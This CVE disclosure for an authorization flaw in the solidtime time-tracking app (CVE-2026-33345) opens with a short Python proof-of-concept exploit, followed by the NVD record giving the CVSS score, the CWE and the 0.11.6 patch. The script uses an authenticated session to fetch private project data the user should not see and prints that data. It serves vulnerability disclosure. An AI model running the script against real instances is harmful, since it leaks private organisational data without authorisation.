CVE-2026-33345

import requests # Configuration TARGET_URL = "https://target-solidtime-instance.com" ORG_ID = "target-org-id" TARGET_PROJECT_UUID = "uuid-of-private-project" SESSION_COOKIE = "valid_session_cookie_value" # Headers headers = { "Cookie": f"solidtime_session={SESSION_COOKIE}", "Accept": "application/json", "User-Agent": "CVE-2026-33345-POC" } # Vulnerable Endpoint # The show() method lacks visibleByEmployee() scope check vuln_endpoint = f"{TARGET_URL}/api/v1/organizations/{ORG_ID}/projects/{TARGET_PROJECT_UUID}" try: response = requests.get(vuln_endpoint, headers=headers) if response.status_code == 200: print("[+] Exploit Successful! Leaked Project Data:") print(response.json()) elif response.status_code == 403: print("[-] Access Denied. Vulnerability might be patched.") else: print(f"[!] Unexpected status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error occurred: {e}")

{"cve": {"id": "CVE-2026-33345", "sourceIdentifier": "[email protected]", "published": "2026-03-24T20:16:29.073", "lastModified": "2026-03-26T13:21:21.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "solidtime is an open-source time-tracking app. Prior to version 0.11.6, the project detail endpoint GET /api/v1/organizations/{org}/projects/{project} allows any authenticated Employee to access any project in the organization by UUID, including private projects they are not a member of. The index() endpoint correctly applies the visibleByEmployee() scope, but show() does not. This issue has been patched in version 0.11.6."}, {"lang": "es", "value": "solidtime es una aplicación de seguimiento de tiempo de código abierto. Antes de la versión 0.11.6, el endpoint de detalles del proyecto GET /API/v1/organizations/{org}/projects/{project} permite a cualquier Empleado autenticado acceder a cualquier proyecto en la organización por UUID, incluyendo proyectos privados de los que no son miembros. El endpoint index() aplica correctamente el ámbito visibleByEmployee(), pero show() no lo hace. Este problema ha sido parcheado en la versión 0.11.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:solidtime:solidtime:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.11.6", "matchCriteriaId": "5F39EBFF-0C6A-407E-9FAC-7B184603B064"}]}]}], "references": [{"url": "https://github.com/solidtime-io/solidtime/commit/192c8c3b887aab34117b983c687934ca7c305209", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/solidtime-io/solidtime/releases/tag/v0.11.6", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/solidtime-io/solidtime/security/advisories/GHSA-354j-rx28-jjxm", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}